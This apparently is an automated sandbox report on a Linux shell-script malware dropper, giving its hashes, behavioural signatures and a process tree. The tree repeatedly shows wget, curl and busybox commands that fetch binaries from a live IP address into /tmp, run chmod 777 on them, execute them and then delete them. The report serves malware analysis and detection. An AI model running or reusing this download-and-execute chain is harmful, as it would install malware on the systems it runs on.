Analysis
-
max time kernel
13s -
max time network
130s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 01:42
Static task
static1
Behavioral task
behavioral1
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
-
Size
10KB
-
MD5
24af39cdca62a1ed0bec6400cfa74142
-
SHA1
ad31bab8b77d23f47f5ca207a515dfed28a2bd5a
-
SHA256
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b
-
SHA512
24fd5e5bb157fe20152b4811bad30f52b5aa416a3faf7ae5c06d3e7fa6388dcb41d528a9aa87bb6c886380c2cf8457510bc89e7d08ae1096ae8d2da0e1f61476
-
SSDEEP
192:HMUrAEWq+TPsHnmpFoBZFD0+kolLMUrAEaTPsHncpFoBZf:HMUrAEWqF0FmMUrAEp
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1568 chmod 1592 chmod 1652 chmod 1508 chmod 1520 chmod 1526 chmod 1622 chmod 1502 chmod 1574 chmod 1580 chmod 1598 chmod 1610 chmod 1634 chmod 1514 chmod 1532 chmod 1658 chmod 1562 chmod 1544 chmod 1550 chmod 1646 chmod 1586 chmod 1664 chmod 1538 chmod 1556 chmod 1604 chmod 1616 chmod 1628 chmod 1640 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i 1503 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm 1509 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA 1515 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw 1521 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb 1527 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k 1533 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 1539 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp 1545 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 1551 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY 1557 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck 1563 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG 1569 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv 1575 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah 1581 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 1587 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY 1593 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck 1599 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG 1605 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv 1611 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah 1617 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i 1623 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm 1629 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA 1635 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw 1641 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb 1647 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k 1653 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 1659 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp 1665 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah curl File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i curl File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA curl File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG curl File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah curl File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb curl File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG curl File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA curl File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm curl File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k curl File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck curl File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb curl File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp curl File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i curl File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw curl File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp curl File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw curl File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY curl File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv curl File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 curl File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY curl File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck curl File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv curl File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k curl File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 curl File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 curl File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 curl File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm curl
Processes
-
/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh1⤵PID:1493
-
/bin/rm/bin/rm bins.sh2⤵PID:1494
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1495
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Writes file to tmp directory
PID:1500
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1501
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:1502
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
PID:1503
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1504
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1505
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1507
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1510
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1513
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1516
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1519
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1525
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1531
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1537
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1543
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1549
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1555
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1561
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1567
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1573
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1579
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1585
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1591
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1597
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1603
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1609
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1615
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1621
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1627
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Writes file to tmp directory
PID:1632
-
-
